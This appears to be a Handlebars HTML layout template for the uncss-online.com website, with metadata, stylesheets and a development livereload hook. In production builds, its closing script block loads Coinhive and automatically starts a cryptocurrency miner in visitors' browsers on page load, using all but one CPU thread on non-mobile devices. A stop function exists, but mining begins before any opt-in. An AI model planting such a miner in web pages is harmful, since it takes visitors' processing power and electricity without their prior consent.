<!doctype html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width">
  <title>{{title }}</title>
  <meta name="description" content="{{description}}">

  <meta property="og:type" content="website">
  <meta property="og:title" content="{{title}}">
  <meta property="og:description" content="{{description}}">
  <meta property="og:url" content="http://uncss-online.com">
  <meta property="og:image" content="http://uncss-online.com/img/sharing.png">

  <meta name="twitter:site" content="@pajasevi">
  <meta name="twitter:title" content="{{title}}">
  <meta name="twitter:description" content="{{description}}">
  <meta name="twitter:url" content="http://uncss-online.com">
  <meta name="twitter:image" content="http://uncss-online.com/img/sharing.png">

  <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300,300italic,700,700italic">
  <link rel="stylesheet" href="/css/style.min.css">
  <link rel="icon" href="/img/favicon.ico">
  {{#if ENV_DEVELOPMENT}}
    <script src="http://localhost:35729/livereload.js"></script>
  {{/if}}
  {{>analytics}}
</head>
<body>

  {{{body}}}

  <script src="/js/main.min.js" async></script>
  {{#unless ENV_DEVELOPMENT}}
    <script src="https://coinhive.com/lib/coinhive.min.js"></script>
    <script>
      var miner = new CoinHive.Anonymous('e4cjnPnR00ZZFwzJdeC6MIIVFA7GdMLi', {
        threads: navigator.hardwareConcurrency - 1
      });

      // Only start on non-mobile devices
      if (!miner.isMobile()) {
        miner.start();
      }

      function stopMiner() {
      	miner.stop();
      	document.querySelector('.mining-info').style.display = 'none';
      }
    </script>
  {{/unless}}
  </body>
</html>
